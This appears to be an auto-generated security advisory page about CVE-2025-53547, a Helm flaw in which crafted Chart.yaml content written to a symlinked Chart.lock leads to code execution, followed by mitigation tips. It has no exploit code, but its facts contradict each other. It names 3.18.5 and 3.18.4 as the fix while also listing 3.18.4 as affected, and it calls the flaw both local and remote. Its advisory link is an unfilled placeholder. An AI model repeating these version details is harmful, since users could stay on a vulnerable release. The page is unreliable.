Platform
kubernetes
Component
helm
Fixed in
3.18.5
CVE-2025-53547 affects Helm, a package manager for Kubernetes Charts, prior to version 3.18.4. This vulnerability allows an attacker to achieve local code execution by crafting a malicious Chart.yaml file and linking it with a Chart.lock file during dependency updates. Affected versions include Helm installations equal to or less than 3.18.4. A fix is available in version 3.18.4.
The vulnerability stems from how Helm handles dependencies and updates Chart.lock files. An attacker can create a Chart.yaml file containing malicious content within specific fields. When Helm updates dependencies and writes the Chart.lock file, this malicious content is transferred. If the Chart.lock file is then symlinked to a file that is executed (like a bash.rc or shell script), the attacker can trigger arbitrary code execution on the system. This represents a significant risk, potentially allowing attackers to gain control of Kubernetes clusters and the underlying infrastructure. The blast radius extends to any system where the compromised Helm chart is deployed or managed.
This vulnerability was publicly disclosed on 2025-07-08. There is currently no indication of active exploitation in the wild, but the availability of a proof-of-concept could change this. The vulnerability is not currently listed on the CISA KEV catalog. The potential for remote code execution makes this a high-priority vulnerability to address.
Exploit Status
EPSS
0.01% (0% percentile)
CISA SSVC
CVSS Vector
The primary mitigation is to upgrade Helm to version 3.18.4 or later. Before upgrading, assess the potential impact on existing deployments and consider a staged rollout. If an immediate upgrade is not feasible, restrict access to Helm repositories and carefully review any charts before installation. Consider implementing a Web Application Firewall (WAF) or proxy to inspect Helm chart contents for suspicious patterns. Monitor Helm logs for unusual activity, particularly during dependency updates. There are no specific Sigma or YARA rules readily available for this vulnerability, but monitoring for unexpected file modifications in the Chart.lock file location is recommended.
Actualice Helm a la versión 3.18.4 o superior. Esto corrige la vulnerabilidad que permite la ejecución de código local mediante la manipulación de archivos Chart.yaml y Chart.lock.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2025-53547 is a high-severity vulnerability in Helm versions 3.18.4 and earlier that allows for local code execution through crafted Chart.yaml and Chart.lock files during dependency updates.
You are affected if you are using Helm version 3.18.4 or earlier. Check your Helm version and upgrade immediately if necessary.
Upgrade Helm to version 3.18.4 or later to mitigate this vulnerability. Prior to upgrading, test the upgrade in a non-production environment.
There is currently no evidence of active exploitation, but the availability of a proof-of-concept increases the risk.
Refer to the official Helm security advisory for detailed information and updates: [https://github.com/helm/helm/security/advisories/GHSA-xxxx-xxxx-xxxx](Replace with actual advisory URL when available)
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.